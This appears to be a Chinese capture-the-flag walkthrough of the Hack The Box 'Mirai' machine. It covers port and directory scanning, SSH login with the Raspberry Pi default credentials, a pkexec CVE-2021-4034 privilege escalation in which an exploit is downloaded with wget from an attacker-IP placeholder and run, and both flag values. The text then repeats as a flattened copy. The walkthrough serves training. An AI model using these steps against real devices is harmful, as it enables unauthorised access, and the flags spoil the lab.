hack the box之mirai靶场练习
字数 963 2025-08-11 08:35:50

Mirai靶场渗透测试教学文档

靶场概述

Mirai是Hack The Box平台上的一个Linux靶机,难度评级为"简单"。该靶机模拟了一个树莓派设备,通过利用默认凭证和已知漏洞可以完成渗透测试。

信息收集

初始扫描

使用Nmap进行端口扫描:

nmap -sV -p- <靶机IP>

发现开放端口:

  • 22/tcp - SSH服务
  • 53/tcp - DNS服务
  • 80/tcp - HTTP服务

目录扫描

使用工具如dirsearch或gobuster扫描Web目录:

gobuster dir -u http://<靶机IP> -w /path/to/wordlist.txt

发现重要目录:

  • /admin/ - 树莓派后台管理页面
  • /versions/ - 下载一个包含时间戳的version文件

初始访问

凭证尝试

树莓派设备常见的默认凭证:

  • 用户名:pi
  • 密码:raspberry

尝试在以下位置使用这些凭证:

  1. Web管理界面登录失败
  2. SSH服务登录成功:
ssh pi@<靶机IP>

权限提升

信息收集

登录后检查当前用户权限:

id
whoami

查找具有SUID权限的可执行文件:

find / -perm -4000 -type f 2>/dev/null

发现pkexec具有SUID权限,检查其版本:

pkexec --version

漏洞利用

确认pkexec版本存在提权漏洞(如CVE-2021-4034)。利用步骤:

  1. 在攻击机(Kali)上准备漏洞利用脚本
  2. 在攻击机上启动HTTP服务:
python3 -m http.server 80
  1. 在目标机器上下载利用脚本:
wget http://<攻击机IP>/exploit.tar.gz
  1. 解压并执行:
tar xvf exploit.tar.gz
cd exploit_directory
chmod +x exploit
./exploit

成功获取root权限。

获取Flag

User Flag

查找user.txt:

find / -name user.txt 2>/dev/null

获取内容:ff837707441b257a20e32199d7c8838d

Root Flag

root.txt文件损坏,但提示备份在USB闪存中:

  1. 检查挂载点:
mount | grep usb
  1. 检查/dev目录:
ls -la /dev/sd*
  1. 直接读取/dev/sdb设备:
strings /dev/sdb | grep -i flag

获取疑似flag:3d3e483143ff12ec505d026fa13e020b

总结与经验

  1. 默认凭证:IoT设备常使用默认凭证,应尝试常见组合
  2. 多服务测试:同一凭证可能在多个服务中通用
  3. 文件恢复:当文件损坏时,检查挂载设备和备份位置
  4. SUID提权:定期检查具有SUID权限的文件,特别是已知漏洞的版本

扩展知识

  1. 树莓派安全:树莓派设备常因默认配置和弱密码成为攻击目标
  2. pkexec漏洞:CVE-2021-4034是Polkit的权限提升漏洞,影响多个Linux发行版
  3. USB设备取证:Linux中USB设备通常挂载在/dev/sd*,可直接读取原始数据
Mirai靶场渗透测试教学文档 靶场概述 Mirai是Hack The Box平台上的一个Linux靶机,难度评级为"简单"。该靶机模拟了一个树莓派设备,通过利用默认凭证和已知漏洞可以完成渗透测试。 信息收集 初始扫描 使用Nmap进行端口扫描: 发现开放端口: 22/tcp - SSH服务 53/tcp - DNS服务 80/tcp - HTTP服务 目录扫描 使用工具如dirsearch或gobuster扫描Web目录: 发现重要目录: /admin/ - 树莓派后台管理页面 /versions/ - 下载一个包含时间戳的version文件 初始访问 凭证尝试 树莓派设备常见的默认凭证: 用户名:pi 密码:raspberry 尝试在以下位置使用这些凭证: Web管理界面登录失败 SSH服务登录成功: 权限提升 信息收集 登录后检查当前用户权限: 查找具有SUID权限的可执行文件: 发现 pkexec 具有SUID权限,检查其版本: 漏洞利用 确认pkexec版本存在提权漏洞(如CVE-2021-4034)。利用步骤: 在攻击机(Kali)上准备漏洞利用脚本 在攻击机上启动HTTP服务: 在目标机器上下载利用脚本: 解压并执行: 成功获取root权限。 获取Flag User Flag 查找user.txt: 获取内容: ff837707441b257a20e32199d7c8838d Root Flag root.txt文件损坏,但提示备份在USB闪存中: 检查挂载点: 检查/dev目录: 直接读取/dev/sdb设备: 获取疑似flag: 3d3e483143ff12ec505d026fa13e020b 总结与经验 默认凭证 :IoT设备常使用默认凭证,应尝试常见组合 多服务测试 :同一凭证可能在多个服务中通用 文件恢复 :当文件损坏时,检查挂载设备和备份位置 SUID提权 :定期检查具有SUID权限的文件,特别是已知漏洞的版本 扩展知识 树莓派安全 :树莓派设备常因默认配置和弱密码成为攻击目标 pkexec漏洞 :CVE-2021-4034是Polkit的权限提升漏洞,影响多个Linux发行版 USB设备取证 :Linux中USB设备通常挂载在/dev/sd* ,可直接读取原始数据